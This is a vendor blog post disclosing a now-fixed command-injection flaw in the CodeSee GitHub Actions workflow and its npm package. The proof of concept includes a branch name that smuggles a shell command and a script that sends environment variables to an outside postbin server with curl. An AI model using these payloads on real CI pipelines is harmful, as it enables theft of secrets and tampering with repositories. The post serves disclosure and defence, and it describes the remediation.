Cycode Collaborates with CodeSee to Secure the Pipelines of Thousands of Open-Source Projects

Head of Security Research

Securing open-source projects is hard, and securing their CI workflows is no less complex. The CI workflows of open-source projects are by definition exposed to the world and can easily be triggered through PR automation without any code review, giving attackers direct access to dev infrastructure. These automations and workflows often leverage third-party components and integrations to improve the development process.

Sometimes, integrating third-party tools, especially for CI purposes, may expand your project’s threat landscape and expose you to risks you didn’t have before. This was the case with CodeSee, with whom we collaborated closely over the past few months to remove one such risk, fixing a vulnerability and applying mitigations that affect thousands of open-source projects.

CodeSee is a startup that provides ways to visualize your codebase and effective tooling for code review and collaboration. Similar to other developer-centric products (e.g., CodeCov), the CodeSee integration creates a new Github Actions workflow that runs its capabilities on every pull request, allowing developers to review the added code efficiently.

In this blog post, we describe how we found that this committed workflow contained several vulnerabilities. Chaining these vulnerabilities could give any user remote code execution (RCE) on the CI pipeline, which could lead to committing code and exfiltrating sensitive tokens without the proper permissions.

Thousands of open-source projects use CodeSee, including projects with many stars.


We worked closely with CodeSee, which quickly fixed the vulnerabilities, remediating the immediate risk posed to all the open-source projects integrating the workflow. In addition, we created a roadmap with CodeSee engineers to improve the security posture of the workflow deployed in open-source projects:

  • Fixing a command injection vulnerability in the codesee npm package that allowed code execution through the branch name. This was fixed in version 0.376.0. Because the workflow pulls the latest version, the fix automatically applies to all existing integrations.
  • Limiting the permissions granted to GITHUB_TOKEN through an explicit definition. This is an excellent post-exploitation mitigation for future vulnerabilities in Github Actions workflows. It applies only to newly integrated projects.
  • Implementing the ability to push workflow changes into existing integrations through pull requests and commits to fix future security issues and insert mitigations, such as the permissions mitigations mentioned previously.
  • Creating a roadmap to migrate from the risky trigger event pull_request_target to the safer trigger pull_request.

With all these mitigations combined, the integrated workflow becomes significantly more secure.

Technical Dive

It all started as standard research in which we scanned the most popular repositories and their Github Actions workflows at scale, trying to find vulnerable CI workflows. During that scan, we found many duplicate workflows in different open-source projects. One of those workflows originated from the projects’ integration with CodeSee, a third-party application that lets you visualize your codebase. When we reached out, CodeSee was eager to collaborate with us to secure their workflow.

Analyzing the Github Action Workflow

The workflow looks like the following:

# This workflow was added by CodeSee. Learn more at https://codesee.io/
on:
  pull_request_target:
    types: [opened, synchronize, reopened]
   
  workflow_dispatch:
 
name: CodeSee Map
 
jobs:
  test_map_action:
    runs-on: ubuntu-latest
    continue-on-error: true
    name: Run CodeSee Map Analysis
    steps:
      - name: checkout
        id: checkout
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.ref }}
        ...
 
      # codesee-detect-languages has an output with id languages.
      - name: Detect Languages
        id: detect-languages
        uses: Codesee-io/codesee-detect-languages-action@latest
 
      # Configures different environments
      ...
 
      - name: Generate Map
        id: generate-map
        uses: Codesee-io/codesee-map-action@latest
        with:
          step: map
        ...
 
      - name: Upload Map
        id: upload-map
        uses: Codesee-io/codesee-map-action@latest
        with:
          step: mapUpload
        ...
 
      - name: Insights
        id: insights
        uses: Codesee-io/codesee-map-action@latest
        with:
          step: insights
        ...

Due to a series of vulnerabilities and misconfigurations in the workflow above, we were able to completely take over the build machine, which could have enabled dangerous malicious behavior.

We will list the issues found and the possible consequences of such a build hijack.

High Permissions for the Pull Request Trigger

The first issue with the workflow is using the unsafe pull_request_target trigger event. The Github security team posted about this dangerous behavior.

The permissions this workflow receives from Github depend on multiple variables:

  • The trigger event, in our case pull_request_target. This event indicates that the workflow should be triggered on each new pull request to the repository and be given write permissions and access to secrets, even when the pull request originates from a fork. By comparison, the pull_request trigger event works similarly, but forked pull requests receive read permissions at most and have no access to secrets.
  • An explicit permissions key in the workflow, which can limit the permissions even further.
  • Organization settings may also limit the permissions given. We can understand whether these configurations are used by observing the build logs:
GITHUB_TOKEN Permissions
  Actions: write
  Checks: write
  Contents: write
  Deployments: write
  Discussions: write
  Issues: write
  Metadata: read
  Packages: write
  Pages: write
  PullRequests: write
  RepositoryProjects: write
  SecurityEvents: write
  Statuses: write
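
The rules in the list above can be approximated with a small model. This is only a sketch under stated assumptions: the function name defaultTokenAccess and its parameters are hypothetical, the permissive defaults match the build log above, and repository or organization settings are ignored.

```javascript
// Simplified, hypothetical model of the rules listed above. It is not GitHub's
// actual implementation and ignores repository and organization settings.
function defaultTokenAccess(triggerEvent, fromFork, explicitPermissions) {
  // pull_request runs that originate from forks get a read-only token and no secrets.
  const restricted = triggerEvent === "pull_request" && fromFork;
  let token = restricted ? "read" : "write";
  // An explicit permissions key (for example read-all) can lower the token level further.
  if (explicitPermissions === "read-all") token = "read";
  return { token, secrets: !restricted };
}

console.log(defaultTokenAccess("pull_request", true));
console.log(defaultTokenAccess("pull_request_target", true));
console.log(defaultTokenAccess("pull_request_target", true, "read-all"));
```

In this model, a forked pull request under pull_request_target keeps both a write token and secret access unless an explicit permissions key lowers the token level.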

Reading User Input

The trigger pull_request_target isn’t dangerous on its own. However, if the workflow analyzes the source code, a potential attacker can craft malicious input, create a forked pull request, and hijack the build workflow.

The next issue in the chain is the checkout of the pull request’s head branch.

While checking out the pull request code sounds trivial, it isn’t for forked pull requests. When a workflow checks out the code and runs its tooling on it (build tools, scanners, or other tooling), it should treat that code as unsafe. In addition, not every use of actions/checkout checks out the forked code: under pull_request_target, the default checkout is the base branch. Here, the parameter ref: ${{ github.event.pull_request.head.ref }} indicates that the pull request’s head branch is checked out.

After the checkout, the workflow runs the CodeSee action Codesee-io/codesee-map-action on the code, which is a wrapper to the codesee npm package. So once we prove that the package analyzes its input insecurely, we’ll be able to perform code execution on the build.

CodeSee was aware of these risks, but their application requires pull_request_target to support the common open-source workflow of contributing using forked pull requests. To mitigate that risk, they took care in writing their code analysis to avoid directly executing any of the code being cloned. They appear to be successful in this regard, as we had to discover an additional issue to gain remote code execution.

Vulnerable NPM Package

This is where things get more interesting. Up to this point, the workflow is running with elevated permissions, checking out the user code, and running an internal NPM package for that code but not yet giving any code execution capability.

We could reverse-engineer the package and look for vulnerabilities, but we found a shortcut. When we call the Codesee-io/codesee-map-action action with the mapUpload parameter, it calls the codesee@latest NPM package with the upload parameter. It also passes additional arguments, such as the branch name as the -f argument. We know that from the action’s JS code:

async function runCodeseeMapUpload(config, githubEventName, githubEventData) {
  const additionalArguments = config.githubRef ? ["-f", config.githubRef] : [];
 
  if (isPullRequestEvent(githubEventName)) {
    additionalArguments.push("-b", config.githubBaseRef);
    additionalArguments.push("-s", githubEventData.pull_request.base.sha);
    additionalArguments.push("-p", githubEventData.number.toString());
  }
 
  const args = [
    "codesee@latest",
    "upload",
    "--type",
    "map",
    "--repo",
    `https://github.com/${config.origin}`,
    "-a",
    config.apiToken,
    ...additionalArguments,
    "codesee.map.json",
  ];
 
  const runExitCode = await exec.exec("npx", args);
 
  return runExitCode;
}

So we tried sending interesting branch names to test whether the program sanitizes them correctly. When we created a pull request with the branch name a";ls;"ech, the logs showed that the program crashed:

Upload Map to Codesee Server
  /usr/local/bin/npx codesee@latest upload --type map --repo https://github.com/AlexILOrg/codesee-demo -a *** -f a";ls;"ech -b main -s b8ac0390a31140ea040c51801cdb9bdc65df6e16 -p 8 codesee.map.json
  codesee v0.364.0
  
  Fetching main from https://github.com/AlexILOrg/codesee-demo.git
  
  Error: Command failed: "/usr/bin/git" "merge-base" "b8ac0390a31140ea040c51801cdb9bdc65df6e16" "a";ls;"ech"
  fatal: Not a valid object name a
  /bin/sh: 1: ech: not found
  
CodeSee Map failed: Error: The process '/usr/local/bin/npx' failed with exit code 1
    Error: The process '/usr/local/bin/npx' failed with exit code 1
    at ExecState._setResult (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1185:25)
    at ExecState.CheckComplete (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1168:18)
    at ChildProcess.<anonymous> (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1062:27)
    at ChildProcess.emit (events.js:314:20)
    at maybeClose (internal/child_process.js:1022:16)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:287:5)

By investigating this error log, we have two insights:

  • fatal: Not a valid object name a: instead of taking the complete branch name a";ls;"ech, it consumed only a. This means that the quote sign (") terminated the string.
  • /bin/sh: 1: ech: not found: this means /bin/sh tried to run the partial text we supplied, ech, as a command, which means we can inject our code!
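
The two insights above can be reproduced with a minimal sketch. It assumes the package built the git command by wrapping each argument in double quotes without escaping quotes inside the branch name. The real codesee source is not shown in this post, so buildMergeBaseCommand and splitOnUnquotedSemicolons are hypothetical names, and the splitter is only a rough approximation of how /bin/sh separates commands.

```javascript
// Hypothetical reconstruction: wraps each argument in double quotes,
// but does not escape quotes that appear inside branchName.
function buildMergeBaseCommand(baseSha, branchName) {
  return `"/usr/bin/git" "merge-base" "${baseSha}" "${branchName}"`;
}

// Rough approximation of how a shell splits a line on unquoted semicolons.
function splitOnUnquotedSemicolons(commandLine) {
  const commands = [];
  let current = "";
  let insideQuotes = false;
  for (const ch of commandLine) {
    if (ch === '"') insideQuotes = !insideQuotes;
    if (ch === ";" && !insideQuotes) {
      // An unquoted semicolon ends the current command.
      commands.push(current.trim());
      current = "";
    } else {
      current += ch;
    }
  }
  commands.push(current.trim());
  return commands;
}

const command = buildMergeBaseCommand(
  "b8ac0390a31140ea040c51801cdb9bdc65df6e16",
  'a";ls;"ech'
);
// Lists three separate commands: the git call ending in "a", then ls, then "ech".
console.log(splitOnUnquotedSemicolons(command));
```

The string built here matches the failed command in the log, and the split shows why git only saw a while the shell went on to run ls and ech as separate commands.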

Let’s see how we use this to execute arbitrary code.

As an attacker, we can create a new malicious script file that would be fetched together with our forked pull request and executed using our code execution capability. It can be quite tricky because:

  • First, we need to give it execution permissions by running chmod. For example, chmod +x ./shell.sh.
  • Second, Github doesn’t allow spaces in branch names. It automatically sanitizes them by replacing each space with a dash (-). This complicates writing a command that gives execution permissions to the shell file.

My Capture-the-Flag (CTF) competition history taught me that such mitigations can often be bypassed, and indeed a short Google search showed that spaces can be replaced with ${IFS} in a Linux shell.

So let’s sum it up and create the flow that causes remote code execution on the pipeline:

  • Let’s say project X contains the vulnerable Github Actions workflow.
  • As the attacker, we fork project X.
  • We add a new shell file with our “malicious” code to the fork. That code sends all environment variables to a postbin server we just created:
env > .env
curl -H 'X-Status: Awesome' --data @'.env' https://www.toptal.com/developers/postbin/1662641903023-0475601626094
  • We commit this shell file into a new branch with the following name: name1";chmod${IFS}+x${IFS}shell.sh;./shell.sh;"name2
  • We create a pull request to the main branch of project X from our newly created branch.

This flow will execute our “malicious” payload on the CI system.
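
Seen from the defender’s side, the branch name in this flow is untrusted input. The following is a minimal sketch of an allowlist check that a tool could run before using a branch name. It is an illustration only, not CodeSee’s fix: the name isSafeBranchName and the chosen character set are assumptions, and a real project may need to allow more characters.

```javascript
// Hypothetical allowlist: letters, digits, dot, underscore, slash, and dash only.
const SAFE_BRANCH_NAME = /^[A-Za-z0-9._\/-]+$/;

function isSafeBranchName(branchName) {
  // Also reject a leading dash so the name cannot be mistaken for a CLI option.
  return SAFE_BRANCH_NAME.test(branchName) && !branchName.startsWith("-");
}

console.log(isSafeBranchName("feature/add-map")); // true
console.log(
  isSafeBranchName('name1";chmod${IFS}+x${IFS}shell.sh;./shell.sh;"name2')
); // false
```

A check like this is defense in depth at best. Avoiding the shell entirely, as described in the remediation, removes the need for escaping logic in the first place.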

We can safely talk about this PoC code because the NPM vulnerability has been fixed, and all current CodeSee integrations are working with the updated package.

Consequences

One could ask what the big deal with this demonstrated code execution is, since the workflow itself doesn’t contain any interesting environment variables or secrets that victims should care about. Unfortunately, this is not the main scenario we are afraid of.

Our previous Github Actions vulnerability research showed another scary attack chain. Malicious actors can use a privileged GITHUB_TOKEN to commit additional code to the repository. This has two possible consequences:

  • Inserting a backdoor into code that will eventually be deployed to end-users.
  • Inserting a workflow that exfiltrates all repository and organization secrets. These may include sensitive tokens, such as AWS/GCP/Azure tokens, Docker Hub/PyPI/NPM tokens, Github personal access tokens for other repositories, and more.

For our workflow, an attacker could use the privileged GITHUB_TOKEN used for the checkout command. Printing the .git/config file yields that token.

Remediation

CodeSee’s internal review found that this injection vulnerability was introduced by a logic bug in the code used to escape the user-supplied branch name. In addition to repairing that logic directly, they replaced all command executions in their code analysis to run without a shell, ensuring that no subtle escaping logic is required. As the CLI is written in Node.js, this involved replacing calls to child_process.exec with child_process.execFile.
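
The difference can be sketched as follows. This is a minimal illustration of the execFile pattern and not CodeSee’s actual code: mergeBaseArgs and gitMergeBase are hypothetical helper names, and the git merge-base call is taken from the error log earlier in this post.

```javascript
const { execFile } = require("child_process");

// Hypothetical helper: builds the argument vector for git merge-base.
// The branch name is one array element, so no quoting or escaping is needed.
function mergeBaseArgs(baseSha, branchName) {
  return ["merge-base", baseSha, branchName];
}

// execFile spawns git directly without /bin/sh, so characters such as
// quotes and semicolons in branchName are never interpreted as shell syntax.
function gitMergeBase(baseSha, branchName, callback) {
  execFile("git", mergeBaseArgs(baseSha, branchName), callback);
}

// The branch name from the proof of concept stays a single argument.
const mergeArgs = mergeBaseArgs(
  "b8ac0390a31140ea040c51801cdb9bdc65df6e16",
  'a";ls;"ech'
);
console.log(mergeArgs.length); // 3
```

With this pattern, git would simply report that a";ls;"ech is not a valid object name, and nothing after the quote would run as a command.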

To further mitigate future vulnerabilities, CodeSee introduced the following permissions setting in the workflow to minimize the privileges of the GITHUB_TOKEN:

permissions: read-all

Even if such vulnerabilities are found in the future, the GITHUB_TOKEN won’t have sufficient permissions to perform any malicious activity.

Summary

The security process described in this article teaches us three interesting lessons for the emerging landscape of software supply chain security.

The first is that the threat landscape for the software supply chain is growing, especially as developer-focused companies emerge to improve developer productivity. The second is that security vendors and non-security vendors can collaborate and, in practice, improve the security posture of many open-source projects. The third is the esoteric input vector of code injection through the branch name, which hasn’t been fully investigated yet.

We encourage using the lessons learned from this process and applying them to additional workflows, further hardening the security posture of CI pipelines.
